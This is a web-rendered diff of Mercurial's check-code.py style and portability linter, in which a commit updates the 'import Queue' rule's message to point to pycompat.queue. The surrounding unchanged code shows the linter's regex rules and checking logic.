##// END OF EJS Templates
pycompat: export queue module instead of symbols in module (API)...
Gregory Szorc -
r37863:8fb99853 @25 default
parent child Browse files
Show More
@@ -1,741 +1,742 b''
1 1 #!/usr/bin/env python
2 2 #
3 3 # check-code - a style and portability checker for Mercurial
4 4 #
5 5 # Copyright 2010 Matt Mackall <mpm@selenic.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """style and portability checker for Mercurial
11 11
12 12 when a rule triggers wrong, do one of the following (prefer one from top):
13 13 * do the work-around the rule suggests
14 14 * doublecheck that it is a false match
15 15 * improve the rule pattern
16 16 * add an ignore pattern to the rule (3rd arg) which matches your good line
17 17 (you can append a short comment and match this, like: #re-raises)
18 18 * change the pattern to a warning and list the exception in test-check-code-hg
19 19 * ONLY use no--check-code for skipping entire files from external sources
20 20 """
21 21
22 22 from __future__ import absolute_import, print_function
23 23 import glob
24 24 import keyword
25 25 import optparse
26 26 import os
27 27 import re
28 28 import sys
29 29 if sys.version_info[0] < 3:
30 30 opentext = open
31 31 else:
32 32 def opentext(f):
33 33 return open(f, encoding='ascii')
34 34 try:
35 35 xrange
36 36 except NameError:
37 37 xrange = range
38 38 try:
39 39 import re2
40 40 except ImportError:
41 41 re2 = None
42 42
43 43 def compilere(pat, multiline=False):
44 44 if multiline:
45 45 pat = '(?m)' + pat
46 46 if re2:
47 47 try:
48 48 return re2.compile(pat)
49 49 except re2.error:
50 50 pass
51 51 return re.compile(pat)
52 52
53 53 # check "rules depending on implementation of repquote()" in each
54 54 # patterns (especially pypats), before changing around repquote()
55 55 _repquotefixedmap = {' ': ' ', '\n': '\n', '.': 'p', ':': 'q',
56 56 '%': '%', '\\': 'b', '*': 'A', '+': 'P', '-': 'M'}
57 57 def _repquoteencodechr(i):
58 58 if i > 255:
59 59 return 'u'
60 60 c = chr(i)
61 61 if c in _repquotefixedmap:
62 62 return _repquotefixedmap[c]
63 63 if c.isalpha():
64 64 return 'x'
65 65 if c.isdigit():
66 66 return 'n'
67 67 return 'o'
68 68 _repquotett = ''.join(_repquoteencodechr(i) for i in xrange(256))
69 69
70 70 def repquote(m):
71 71 t = m.group('text')
72 72 t = t.translate(_repquotett)
73 73 return m.group('quote') + t + m.group('quote')
74 74
75 75 def reppython(m):
76 76 comment = m.group('comment')
77 77 if comment:
78 78 l = len(comment.rstrip())
79 79 return "#" * l + comment[l:]
80 80 return repquote(m)
81 81
82 82 def repcomment(m):
83 83 return m.group(1) + "#" * len(m.group(2))
84 84
85 85 def repccomment(m):
86 86 t = re.sub(r"((?<=\n) )|\S", "x", m.group(2))
87 87 return m.group(1) + t + "*/"
88 88
89 89 def repcallspaces(m):
90 90 t = re.sub(r"\n\s+", "\n", m.group(2))
91 91 return m.group(1) + t
92 92
93 93 def repinclude(m):
94 94 return m.group(1) + "<foo>"
95 95
96 96 def rephere(m):
97 97 t = re.sub(r"\S", "x", m.group(2))
98 98 return m.group(1) + t
99 99
100 100
101 101 testpats = [
102 102 [
103 103 (r'\b(push|pop)d\b', "don't use 'pushd' or 'popd', use 'cd'"),
104 104 (r'\W\$?\(\([^\)\n]*\)\)', "don't use (()) or $(()), use 'expr'"),
105 105 (r'grep.*-q', "don't use 'grep -q', redirect to /dev/null"),
106 106 (r'(?<!hg )grep.* -a', "don't use 'grep -a', use in-line python"),
107 107 (r'sed.*-i', "don't use 'sed -i', use a temporary file"),
108 108 (r'\becho\b.*\\n', "don't use 'echo \\n', use printf"),
109 109 (r'echo -n', "don't use 'echo -n', use printf"),
110 110 (r'(^|\|\s*)\bwc\b[^|]*$\n(?!.*\(re\))', "filter wc output"),
111 111 (r'head -c', "don't use 'head -c', use 'dd'"),
112 112 (r'tail -n', "don't use the '-n' option to tail, just use '-<num>'"),
113 113 (r'sha1sum', "don't use sha1sum, use $TESTDIR/md5sum.py"),
114 114 (r'\bls\b.*-\w*R', "don't use 'ls -R', use 'find'"),
115 115 (r'printf.*[^\\]\\([1-9]|0\d)', r"don't use 'printf \NNN', use Python"),
116 116 (r'printf.*[^\\]\\x', "don't use printf \\x, use Python"),
117 117 (r'\$\(.*\)', "don't use $(expr), use `expr`"),
118 118 (r'rm -rf \*', "don't use naked rm -rf, target a directory"),
119 119 (r'\[[^\]]+==', '[ foo == bar ] is a bashism, use [ foo = bar ] instead'),
120 120 (r'(^|\|\s*)grep (-\w\s+)*[^|]*[(|]\w',
121 121 "use egrep for extended grep syntax"),
122 122 (r'(^|\|\s*)e?grep .*\\S', "don't use \\S in regular expression"),
123 123 (r'(?<!!)/bin/', "don't use explicit paths for tools"),
124 124 (r'#!.*/bash', "don't use bash in shebang, use sh"),
125 125 (r'[^\n]\Z', "no trailing newline"),
126 126 (r'export .*=', "don't export and assign at once"),
127 127 (r'^source\b', "don't use 'source', use '.'"),
128 128 (r'touch -d', "don't use 'touch -d', use 'touch -t' instead"),
129 129 (r'\bls +[^|\n-]+ +-', "options to 'ls' must come before filenames"),
130 130 (r'[^>\n]>\s*\$HGRCPATH', "don't overwrite $HGRCPATH, append to it"),
131 131 (r'^stop\(\)', "don't use 'stop' as a shell function name"),
132 132 (r'(\[|\btest\b).*-e ', "don't use 'test -e', use 'test -f'"),
133 133 (r'\[\[\s+[^\]]*\]\]', "don't use '[[ ]]', use '[ ]'"),
134 134 (r'^alias\b.*=', "don't use alias, use a function"),
135 135 (r'if\s*!', "don't use '!' to negate exit status"),
136 136 (r'/dev/u?random', "don't use entropy, use /dev/zero"),
137 137 (r'do\s*true;\s*done', "don't use true as loop body, use sleep 0"),
138 138 (r'sed (-e )?\'(\d+|/[^/]*/)i(?!\\\n)',
139 139 "put a backslash-escaped newline after sed 'i' command"),
140 140 (r'^diff *-\w*[uU].*$\n(^ \$ |^$)', "prefix diff -u/-U with cmp"),
141 141 (r'^\s+(if)? diff *-\w*[uU]', "prefix diff -u/-U with cmp"),
142 142 (r'[\s="`\']python\s(?!bindings)', "don't use 'python', use '$PYTHON'"),
143 143 (r'seq ', "don't use 'seq', use $TESTDIR/seq.py"),
144 144 (r'\butil\.Abort\b', "directly use error.Abort"),
145 145 (r'\|&', "don't use |&, use 2>&1"),
146 146 (r'\w = +\w', "only one space after = allowed"),
147 147 (r'\bsed\b.*[^\\]\\n', "don't use 'sed ... \\n', use a \\ and a newline"),
148 148 (r'env.*-u', "don't use 'env -u VAR', use 'unset VAR'"),
149 149 (r'cp.* -r ', "don't use 'cp -r', use 'cp -R'"),
150 150 (r'grep.* -[ABC]', "don't use grep's context flags"),
151 151 (r'find.*-printf',
152 152 "don't use 'find -printf', it doesn't exist on BSD find(1)"),
153 153 (r'\$RANDOM ', "don't use bash-only $RANDOM to generate random values"),
154 154 ],
155 155 # warnings
156 156 [
157 157 (r'^function', "don't use 'function', use old style"),
158 158 (r'^diff.*-\w*N', "don't use 'diff -N'"),
159 159 (r'\$PWD|\${PWD}', "don't use $PWD, use `pwd`"),
160 160 (r'^([^"\'\n]|("[^"\n]*")|(\'[^\'\n]*\'))*\^', "^ must be quoted"),
161 161 (r'kill (`|\$\()', "don't use kill, use killdaemons.py")
162 162 ]
163 163 ]
164 164
165 165 testfilters = [
166 166 (r"( *)(#([^!][^\n]*\S)?)", repcomment),
167 167 (r"<<(\S+)((.|\n)*?\n\1)", rephere),
168 168 ]
169 169
170 170 uprefix = r"^ \$ "
171 171 utestpats = [
172 172 [
173 173 (r'^(\S.*|| [$>] \S.*)[ \t]\n', "trailing whitespace on non-output"),
174 174 (uprefix + r'.*\|\s*sed[^|>\n]*\n',
175 175 "use regex test output patterns instead of sed"),
176 176 (uprefix + r'(true|exit 0)', "explicit zero exit unnecessary"),
177 177 (uprefix + r'.*(?<!\[)\$\?', "explicit exit code checks unnecessary"),
178 178 (uprefix + r'.*\|\| echo.*(fail|error)',
179 179 "explicit exit code checks unnecessary"),
180 180 (uprefix + r'set -e', "don't use set -e"),
181 181 (uprefix + r'(\s|fi\b|done\b)', "use > for continued lines"),
182 182 (uprefix + r'.*:\.\S*/', "x:.y in a path does not work on msys, rewrite "
183 183 "as x://.y, or see `hg log -k msys` for alternatives", r'-\S+:\.|' #-Rxxx
184 184 '# no-msys'), # in test-pull.t which is skipped on windows
185 185 (r'^ [^$>].*27\.0\.0\.1',
186 186 'use $LOCALIP not an explicit loopback address'),
187 187 (r'^ (?![>$] ).*\$LOCALIP.*[^)]$',
188 188 'mark $LOCALIP output lines with (glob) to help tests in BSD jails'),
189 189 (r'^ (cat|find): .*: \$ENOENT\$',
190 190 'use test -f to test for file existence'),
191 191 (r'^ diff -[^ -]*p',
192 192 "don't use (external) diff with -p for portability"),
193 193 (r' readlink ', 'use readlink.py instead of readlink'),
194 194 (r'^ [-+][-+][-+] .* [-+]0000 \(glob\)',
195 195 "glob timezone field in diff output for portability"),
196 196 (r'^ @@ -[0-9]+ [+][0-9]+,[0-9]+ @@',
197 197 "use '@@ -N* +N,n @@ (glob)' style chunk header for portability"),
198 198 (r'^ @@ -[0-9]+,[0-9]+ [+][0-9]+ @@',
199 199 "use '@@ -N,n +N* @@ (glob)' style chunk header for portability"),
200 200 (r'^ @@ -[0-9]+ [+][0-9]+ @@',
201 201 "use '@@ -N* +N* @@ (glob)' style chunk header for portability"),
202 202 (uprefix + r'hg( +-[^ ]+( +[^ ]+)?)* +extdiff'
203 203 r'( +(-[^ po-]+|--(?!program|option)[^ ]+|[^-][^ ]*))*$',
204 204 "use $RUNTESTDIR/pdiff via extdiff (or -o/-p for false-positives)"),
205 205 ],
206 206 # warnings
207 207 [
208 208 (r'^ (?!.*\$LOCALIP)[^*?/\n]* \(glob\)$',
209 209 "glob match with no glob string (?, *, /, and $LOCALIP)"),
210 210 ]
211 211 ]
212 212
213 213 # transform plain test rules to unified test's
214 214 for i in [0, 1]:
215 215 for tp in testpats[i]:
216 216 p = tp[0]
217 217 m = tp[1]
218 218 if p.startswith(r'^'):
219 219 p = r"^ [$>] (%s)" % p[1:]
220 220 else:
221 221 p = r"^ [$>] .*(%s)" % p
222 222 utestpats[i].append((p, m) + tp[2:])
223 223
224 224 # don't transform the following rules:
225 225 # " > \t" and " \t" should be allowed in unified tests
226 226 testpats[0].append((r'^( *)\t', "don't use tabs to indent"))
227 227 utestpats[0].append((r'^( ?)\t', "don't use tabs to indent"))
228 228
229 229 utestfilters = [
230 230 (r"<<(\S+)((.|\n)*?\n > \1)", rephere),
231 231 (r"( +)(#([^!][^\n]*\S)?)", repcomment),
232 232 ]
233 233
234 234 pypats = [
235 235 [
236 236 (r'^\s*def\s*\w+\s*\(.*,\s*\(',
237 237 "tuple parameter unpacking not available in Python 3+"),
238 238 (r'lambda\s*\(.*,.*\)',
239 239 "tuple parameter unpacking not available in Python 3+"),
240 240 (r'(?<!def)\s+(cmp)\(', "cmp is not available in Python 3+"),
241 241 (r'(?<!\.)\breduce\s*\(.*', "reduce is not available in Python 3+"),
242 242 (r'\bdict\(.*=', 'dict() is different in Py2 and 3 and is slower than {}',
243 243 'dict-from-generator'),
244 244 (r'\.has_key\b', "dict.has_key is not available in Python 3+"),
245 245 (r'\s<>\s', '<> operator is not available in Python 3+, use !='),
246 246 (r'^\s*\t', "don't use tabs"),
247 247 (r'\S;\s*\n', "semicolon"),
248 248 (r'[^_]_\([ \t\n]*(?:"[^"]+"[ \t\n+]*)+%', "don't use % inside _()"),
249 249 (r"[^_]_\([ \t\n]*(?:'[^']+'[ \t\n+]*)+%", "don't use % inside _()"),
250 250 (r'(\w|\)),\w', "missing whitespace after ,"),
251 251 (r'(\w|\))[+/*\-<>]\w', "missing whitespace in expression"),
252 252 (r'^\s+(\w|\.)+=\w[^,()\n]*$', "missing whitespace in assignment"),
253 253 (r'\w\s=\s\s+\w', "gratuitous whitespace after ="),
254 254 ((
255 255 # a line ending with a colon, potentially with trailing comments
256 256 r':([ \t]*#[^\n]*)?\n'
257 257 # one that is not a pass and not only a comment
258 258 r'(?P<indent>[ \t]+)[^#][^\n]+\n'
259 259 # more lines at the same indent level
260 260 r'((?P=indent)[^\n]+\n)*'
261 261 # a pass at the same indent level, which is bogus
262 262 r'(?P=indent)pass[ \t\n#]'
263 263 ), 'omit superfluous pass'),
264 264 (r'.{81}', "line too long"),
265 265 (r'[^\n]\Z', "no trailing newline"),
266 266 (r'(\S[ \t]+|^[ \t]+)\n', "trailing whitespace"),
267 267 # (r'^\s+[^_ \n][^_. \n]+_[^_\n]+\s*=',
268 268 # "don't use underbars in identifiers"),
269 269 (r'^\s+(self\.)?[A-Za-z][a-z0-9]+[A-Z]\w* = ',
270 270 "don't use camelcase in identifiers", r'#.*camelcase-required'),
271 271 (r'^\s*(if|while|def|class|except|try)\s[^[\n]*:\s*[^\\n]#\s]+',
272 272 "linebreak after :"),
273 273 (r'class\s[^( \n]+:', "old-style class, use class foo(object)",
274 274 r'#.*old-style'),
275 275 (r'class\s[^( \n]+\(\):',
276 276 "class foo() creates old style object, use class foo(object)",
277 277 r'#.*old-style'),
278 278 (r'\b(%s)\(' % '|'.join(k for k in keyword.kwlist
279 279 if k not in ('print', 'exec')),
280 280 "Python keyword is not a function"),
281 281 (r',]', "unneeded trailing ',' in list"),
282 282 # (r'class\s[A-Z][^\(]*\((?!Exception)',
283 283 # "don't capitalize non-exception classes"),
284 284 # (r'in range\(', "use xrange"),
285 285 # (r'^\s*print\s+', "avoid using print in core and extensions"),
286 286 (r'[\x80-\xff]', "non-ASCII character literal"),
287 287 (r'("\')\.format\(', "str.format() has no bytes counterpart, use %"),
288 288 (r'^\s*(%s)\s\s' % '|'.join(keyword.kwlist),
289 289 "gratuitous whitespace after Python keyword"),
290 290 (r'([\(\[][ \t]\S)|(\S[ \t][\)\]])', "gratuitous whitespace in () or []"),
291 291 # (r'\s\s=', "gratuitous whitespace before ="),
292 292 (r'[^>< ](\+=|-=|!=|<>|<=|>=|<<=|>>=|%=)\S',
293 293 "missing whitespace around operator"),
294 294 (r'[^>< ](\+=|-=|!=|<>|<=|>=|<<=|>>=|%=)\s',
295 295 "missing whitespace around operator"),
296 296 (r'\s(\+=|-=|!=|<>|<=|>=|<<=|>>=|%=)\S',
297 297 "missing whitespace around operator"),
298 298 (r'[^^+=*/!<>&| %-](\s=|=\s)[^= ]',
299 299 "wrong whitespace around ="),
300 300 (r'\([^()]*( =[^=]|[^<>!=]= )',
301 301 "no whitespace around = for named parameters"),
302 302 (r'raise Exception', "don't raise generic exceptions"),
303 303 (r'raise [^,(]+, (\([^\)]+\)|[^,\(\)]+)$',
304 304 "don't use old-style two-argument raise, use Exception(message)"),
305 305 (r' is\s+(not\s+)?["\'0-9-]', "object comparison with literal"),
306 306 (r' [=!]=\s+(True|False|None)',
307 307 "comparison with singleton, use 'is' or 'is not' instead"),
308 308 (r'^\s*(while|if) [01]:',
309 309 "use True/False for constant Boolean expression"),
310 310 (r'^\s*if False(:| +and)', 'Remove code instead of using `if False`'),
311 311 (r'(?:(?<!def)\s+|\()hasattr\(',
312 312 'hasattr(foo, bar) is broken on py2, use util.safehasattr(foo, bar) '
313 313 'instead', r'#.*hasattr-py3-only'),
314 314 (r'opener\([^)]*\).read\(',
315 315 "use opener.read() instead"),
316 316 (r'opener\([^)]*\).write\(',
317 317 "use opener.write() instead"),
318 318 (r'[\s\(](open|file)\([^)]*\)\.read\(',
319 319 "use util.readfile() instead"),
320 320 (r'[\s\(](open|file)\([^)]*\)\.write\(',
321 321 "use util.writefile() instead"),
322 322 (r'^[\s\(]*(open(er)?|file)\([^)]*\)(?!\.close\(\))',
323 323 "always assign an opened file to a variable, and close it afterwards"),
324 324 (r'[\s\(](open|file)\([^)]*\)\.(?!close\(\))',
325 325 "always assign an opened file to a variable, and close it afterwards"),
326 326 (r'(?i)descend[e]nt', "the proper spelling is descendAnt"),
327 327 (r'\.debug\(\_', "don't mark debug messages for translation"),
328 328 (r'\.strip\(\)\.split\(\)', "no need to strip before splitting"),
329 329 (r'^\s*except\s*:', "naked except clause", r'#.*re-raises'),
330 330 (r'^\s*except\s([^\(,]+|\([^\)]+\))\s*,',
331 331 'legacy exception syntax; use "as" instead of ","'),
332 332 (r':\n( )*( ){1,3}[^ ]', "must indent 4 spaces"),
333 333 (r'release\(.*wlock, .*lock\)', "wrong lock release order"),
334 334 (r'\bdef\s+__bool__\b', "__bool__ should be __nonzero__ in Python 2"),
335 335 (r'os\.path\.join\(.*, *(""|\'\')\)',
336 336 "use pathutil.normasprefix(path) instead of os.path.join(path, '')"),
337 337 (r'\s0[0-7]+\b', 'legacy octal syntax; use "0o" prefix instead of "0"'),
338 338 # XXX only catch mutable arguments on the first line of the definition
339 339 (r'def.*[( ]\w+=\{\}', "don't use mutable default arguments"),
340 340 (r'\butil\.Abort\b', "directly use error.Abort"),
341 341 (r'^@(\w*\.)?cachefunc', "module-level @cachefunc is risky, please avoid"),
342 342 (r'^import atexit', "don't use atexit, use ui.atexit"),
343 (r'^import Queue', "don't use Queue, use util.queue + util.empty"),
343 (r'^import Queue', "don't use Queue, use pycompat.queue.Queue + "
344 "pycompat.queue.Empty"),
344 345 (r'^import cStringIO', "don't use cStringIO.StringIO, use util.stringio"),
345 346 (r'^import urllib', "don't use urllib, use util.urlreq/util.urlerr"),
346 347 (r'^import SocketServer', "don't use SockerServer, use util.socketserver"),
347 348 (r'^import urlparse', "don't use urlparse, use util.urlreq"),
348 349 (r'^import xmlrpclib', "don't use xmlrpclib, use util.xmlrpclib"),
349 350 (r'^import cPickle', "don't use cPickle, use util.pickle"),
350 351 (r'^import pickle', "don't use pickle, use util.pickle"),
351 352 (r'^import httplib', "don't use httplib, use util.httplib"),
352 353 (r'^import BaseHTTPServer', "use util.httpserver instead"),
353 354 (r'^(from|import) mercurial\.(cext|pure|cffi)',
354 355 "use mercurial.policy.importmod instead"),
355 356 (r'\.next\(\)', "don't use .next(), use next(...)"),
356 357 (r'([a-z]*).revision\(\1\.node\(',
357 358 "don't convert rev to node before passing to revision(nodeorrev)"),
358 359 (r'platform\.system\(\)', "don't use platform.system(), use pycompat"),
359 360
360 361 # rules depending on implementation of repquote()
361 362 (r' x+[xpqo%APM][\'"]\n\s+[\'"]x',
362 363 'string join across lines with no space'),
363 364 (r'''(?x)ui\.(status|progress|write|note|warn)\(
364 365 [ \t\n#]*
365 366 (?# any strings/comments might precede a string, which
366 367 # contains translatable message)
367 368 ((['"]|\'\'\'|""")[ \npq%bAPMxno]*(['"]|\'\'\'|""")[ \t\n#]+)*
368 369 (?# sequence consisting of below might precede translatable message
369 370 # - formatting string: "% 10s", "%05d", "% -3.2f", "%*s", "%%" ...
370 371 # - escaped character: "\\", "\n", "\0" ...
371 372 # - character other than '%', 'b' as '\', and 'x' as alphabet)
372 373 (['"]|\'\'\'|""")
373 374 ((%([ n]?[PM]?([np]+|A))?x)|%%|b[bnx]|[ \nnpqAPMo])*x
374 375 (?# this regexp can't use [^...] style,
375 376 # because _preparepats forcibly adds "\n" into [^...],
376 377 # even though this regexp wants match it against "\n")''',
377 378 "missing _() in ui message (use () to hide false-positives)"),
378 379 ],
379 380 # warnings
380 381 [
381 382 # rules depending on implementation of repquote()
382 383 (r'(^| )pp +xxxxqq[ \n][^\n]', "add two newlines after '.. note::'"),
383 384 ]
384 385 ]
385 386
386 387 pyfilters = [
387 388 (r"""(?msx)(?P<comment>\#.*?$)|
388 389 ((?P<quote>('''|\"\"\"|(?<!')'(?!')|(?<!")"(?!")))
389 390 (?P<text>(([^\\]|\\.)*?))
390 391 (?P=quote))""", reppython),
391 392 ]
392 393
393 394 # non-filter patterns
394 395 pynfpats = [
395 396 [
396 397 (r'pycompat\.osname\s*[=!]=\s*[\'"]nt[\'"]', "use pycompat.iswindows"),
397 398 (r'pycompat\.osname\s*[=!]=\s*[\'"]posix[\'"]', "use pycompat.isposix"),
398 399 (r'pycompat\.sysplatform\s*[!=]=\s*[\'"]darwin[\'"]',
399 400 "use pycompat.isdarwin"),
400 401 ],
401 402 # warnings
402 403 [],
403 404 ]
404 405
405 406 # extension non-filter patterns
406 407 pyextnfpats = [
407 408 [(r'^"""\n?[A-Z]', "don't capitalize docstring title")],
408 409 # warnings
409 410 [],
410 411 ]
411 412
412 413 txtfilters = []
413 414
414 415 txtpats = [
415 416 [
416 417 ('\s$', 'trailing whitespace'),
417 418 ('.. note::[ \n][^\n]', 'add two newlines after note::')
418 419 ],
419 420 []
420 421 ]
421 422
422 423 cpats = [
423 424 [
424 425 (r'//', "don't use //-style comments"),
425 426 (r'\S\t', "don't use tabs except for indent"),
426 427 (r'(\S[ \t]+|^[ \t]+)\n', "trailing whitespace"),
427 428 (r'.{81}', "line too long"),
428 429 (r'(while|if|do|for)\(', "use space after while/if/do/for"),
429 430 (r'return\(', "return is not a function"),
430 431 (r' ;', "no space before ;"),
431 432 (r'[^;] \)', "no space before )"),
432 433 (r'[)][{]', "space between ) and {"),
433 434 (r'\w+\* \w+', "use int *foo, not int* foo"),
434 435 (r'\W\([^\)]+\) \w+', "use (int)foo, not (int) foo"),
435 436 (r'\w+ (\+\+|--)', "use foo++, not foo ++"),
436 437 (r'\w,\w', "missing whitespace after ,"),
437 438 (r'^[^#]\w[+/*]\w', "missing whitespace in expression"),
438 439 (r'\w\s=\s\s+\w', "gratuitous whitespace after ="),
439 440 (r'^#\s+\w', "use #foo, not # foo"),
440 441 (r'[^\n]\Z', "no trailing newline"),
441 442 (r'^\s*#import\b', "use only #include in standard C code"),
442 443 (r'strcpy\(', "don't use strcpy, use strlcpy or memcpy"),
443 444 (r'strcat\(', "don't use strcat"),
444 445
445 446 # rules depending on implementation of repquote()
446 447 ],
447 448 # warnings
448 449 [
449 450 # rules depending on implementation of repquote()
450 451 ]
451 452 ]
452 453
453 454 cfilters = [
454 455 (r'(/\*)(((\*(?!/))|[^*])*)\*/', repccomment),
455 456 (r'''(?P<quote>(?<!")")(?P<text>([^"]|\\")+)"(?!")''', repquote),
456 457 (r'''(#\s*include\s+<)([^>]+)>''', repinclude),
457 458 (r'(\()([^)]+\))', repcallspaces),
458 459 ]
459 460
460 461 inutilpats = [
461 462 [
462 463 (r'\bui\.', "don't use ui in util"),
463 464 ],
464 465 # warnings
465 466 []
466 467 ]
467 468
468 469 inrevlogpats = [
469 470 [
470 471 (r'\brepo\.', "don't use repo in revlog"),
471 472 ],
472 473 # warnings
473 474 []
474 475 ]
475 476
476 477 webtemplatefilters = []
477 478
478 479 webtemplatepats = [
479 480 [],
480 481 [
481 482 (r'{desc(\|(?!websub|firstline)[^\|]*)+}',
482 483 'follow desc keyword with either firstline or websub'),
483 484 ]
484 485 ]
485 486
486 487 allfilesfilters = []
487 488
488 489 allfilespats = [
489 490 [
490 491 (r'(http|https)://[a-zA-Z0-9./]*selenic.com/',
491 492 'use mercurial-scm.org domain URL'),
492 493 (r'mercurial@selenic\.com',
493 494 'use mercurial-scm.org domain for mercurial ML address'),
494 495 (r'mercurial-devel@selenic\.com',
495 496 'use mercurial-scm.org domain for mercurial-devel ML address'),
496 497 ],
497 498 # warnings
498 499 [],
499 500 ]
500 501
501 502 py3pats = [
502 503 [
503 504 (r'os\.environ', "use encoding.environ instead (py3)", r'#.*re-exports'),
504 505 (r'os\.name', "use pycompat.osname instead (py3)"),
505 506 (r'os\.getcwd', "use pycompat.getcwd instead (py3)"),
506 507 (r'os\.sep', "use pycompat.ossep instead (py3)"),
507 508 (r'os\.pathsep', "use pycompat.ospathsep instead (py3)"),
508 509 (r'os\.altsep', "use pycompat.osaltsep instead (py3)"),
509 510 (r'sys\.platform', "use pycompat.sysplatform instead (py3)"),
510 511 (r'getopt\.getopt', "use pycompat.getoptb instead (py3)"),
511 512 (r'os\.getenv', "use encoding.environ.get instead"),
512 513 (r'os\.setenv', "modifying the environ dict is not preferred"),
513 514 ],
514 515 # warnings
515 516 [],
516 517 ]
517 518
518 519 checks = [
519 520 ('python', r'.*\.(py|cgi)$', r'^#!.*python', pyfilters, pypats),
520 521 ('python', r'.*\.(py|cgi)$', r'^#!.*python', [], pynfpats),
521 522 ('python', r'.*hgext.*\.py$', '', [], pyextnfpats),
522 523 ('python 3', r'.*(hgext|mercurial)/(?!demandimport|policy|pycompat).*\.py',
523 524 '', pyfilters, py3pats),
524 525 ('test script', r'(.*/)?test-[^.~]*$', '', testfilters, testpats),
525 526 ('c', r'.*\.[ch]$', '', cfilters, cpats),
526 527 ('unified test', r'.*\.t$', '', utestfilters, utestpats),
527 528 ('layering violation repo in revlog', r'mercurial/revlog\.py', '',
528 529 pyfilters, inrevlogpats),
529 530 ('layering violation ui in util', r'mercurial/util\.py', '', pyfilters,
530 531 inutilpats),
531 532 ('txt', r'.*\.txt$', '', txtfilters, txtpats),
532 533 ('web template', r'mercurial/templates/.*\.tmpl', '',
533 534 webtemplatefilters, webtemplatepats),
534 535 ('all except for .po', r'.*(?<!\.po)$', '',
535 536 allfilesfilters, allfilespats),
536 537 ]
537 538
538 539 def _preparepats():
539 540 for c in checks:
540 541 failandwarn = c[-1]
541 542 for pats in failandwarn:
542 543 for i, pseq in enumerate(pats):
543 544 # fix-up regexes for multi-line searches
544 545 p = pseq[0]
545 546 # \s doesn't match \n (done in two steps)
546 547 # first, we replace \s that appears in a set already
547 548 p = re.sub(r'\[\\s', r'[ \\t', p)
548 549 # now we replace other \s instances.
549 550 p = re.sub(r'(?<!(\\|\[))\\s', r'[ \\t]', p)
550 551 # [^...] doesn't match newline
551 552 p = re.sub(r'(?<!\\)\[\^', r'[^\\n', p)
552 553
553 554 pats[i] = (re.compile(p, re.MULTILINE),) + pseq[1:]
554 555 filters = c[3]
555 556 for i, flt in enumerate(filters):
556 557 filters[i] = re.compile(flt[0]), flt[1]
557 558
558 559 class norepeatlogger(object):
559 560 def __init__(self):
560 561 self._lastseen = None
561 562
562 563 def log(self, fname, lineno, line, msg, blame):
563 564 """print error related a to given line of a given file.
564 565
565 566 The faulty line will also be printed but only once in the case
566 567 of multiple errors.
567 568
568 569 :fname: filename
569 570 :lineno: line number
570 571 :line: actual content of the line
571 572 :msg: error message
572 573 """
573 574 msgid = fname, lineno, line
574 575 if msgid != self._lastseen:
575 576 if blame:
576 577 print("%s:%d (%s):" % (fname, lineno, blame))
577 578 else:
578 579 print("%s:%d:" % (fname, lineno))
579 580 print(" > %s" % line)
580 581 self._lastseen = msgid
581 582 print(" " + msg)
582 583
583 584 _defaultlogger = norepeatlogger()
584 585
585 586 def getblame(f):
586 587 lines = []
587 588 for l in os.popen('hg annotate -un %s' % f):
588 589 start, line = l.split(':', 1)
589 590 user, rev = start.split()
590 591 lines.append((line[1:-1], user, rev))
591 592 return lines
592 593
593 594 def checkfile(f, logfunc=_defaultlogger.log, maxerr=None, warnings=False,
594 595 blame=False, debug=False, lineno=True):
595 596 """checks style and portability of a given file
596 597
597 598 :f: filepath
598 599 :logfunc: function used to report error
599 600 logfunc(filename, linenumber, linecontent, errormessage)
600 601 :maxerr: number of error to display before aborting.
601 602 Set to false (default) to report all errors
602 603
603 604 return True if no error is found, False otherwise.
604 605 """
605 606 blamecache = None
606 607 result = True
607 608
608 609 try:
609 610 with opentext(f) as fp:
610 611 try:
611 612 pre = post = fp.read()
612 613 except UnicodeDecodeError as e:
613 614 print("%s while reading %s" % (e, f))
614 615 return result
615 616 except IOError as e:
616 617 print("Skipping %s, %s" % (f, str(e).split(':', 1)[0]))
617 618 return result
618 619
619 620 for name, match, magic, filters, pats in checks:
620 621 post = pre # discard filtering result of previous check
621 622 if debug:
622 623 print(name, f)
623 624 fc = 0
624 625 if not (re.match(match, f) or (magic and re.search(magic, pre))):
625 626 if debug:
626 627 print("Skipping %s for %s it doesn't match %s" % (
627 628 name, match, f))
628 629 continue
629 630 if "no-" "check-code" in pre:
630 631 # If you're looking at this line, it's because a file has:
631 632 # no- check- code
632 633 # but the reason to output skipping is to make life for
633 634 # tests easier. So, instead of writing it with a normal
634 635 # spelling, we write it with the expected spelling from
635 636 # tests/test-check-code.t
636 637 print("Skipping %s it has no-che?k-code (glob)" % f)
637 638 return "Skip" # skip checking this file
638 639 for p, r in filters:
639 640 post = re.sub(p, r, post)
640 641 nerrs = len(pats[0]) # nerr elements are errors
641 642 if warnings:
642 643 pats = pats[0] + pats[1]
643 644 else:
644 645 pats = pats[0]
645 646 # print post # uncomment to show filtered version
646 647
647 648 if debug:
648 649 print("Checking %s for %s" % (name, f))
649 650
650 651 prelines = None
651 652 errors = []
652 653 for i, pat in enumerate(pats):
653 654 if len(pat) == 3:
654 655 p, msg, ignore = pat
655 656 else:
656 657 p, msg = pat
657 658 ignore = None
658 659 if i >= nerrs:
659 660 msg = "warning: " + msg
660 661
661 662 pos = 0
662 663 n = 0
663 664 for m in p.finditer(post):
664 665 if prelines is None:
665 666 prelines = pre.splitlines()
666 667 postlines = post.splitlines(True)
667 668
668 669 start = m.start()
669 670 while n < len(postlines):
670 671 step = len(postlines[n])
671 672 if pos + step > start:
672 673 break
673 674 pos += step
674 675 n += 1
675 676 l = prelines[n]
676 677
677 678 if ignore and re.search(ignore, l, re.MULTILINE):
678 679 if debug:
679 680 print("Skipping %s for %s:%s (ignore pattern)" % (
680 681 name, f, n))
681 682 continue
682 683 bd = ""
683 684 if blame:
684 685 bd = 'working directory'
685 686 if not blamecache:
686 687 blamecache = getblame(f)
687 688 if n < len(blamecache):
688 689 bl, bu, br = blamecache[n]
689 690 if bl == l:
690 691 bd = '%s@%s' % (bu, br)
691 692
692 693 errors.append((f, lineno and n + 1, l, msg, bd))
693 694 result = False
694 695
695 696 errors.sort()
696 697 for e in errors:
697 698 logfunc(*e)
698 699 fc += 1
699 700 if maxerr and fc >= maxerr:
700 701 print(" (too many errors, giving up)")
701 702 break
702 703
703 704 return result
704 705
705 706 def main():
706 707 parser = optparse.OptionParser("%prog [options] [files | -]")
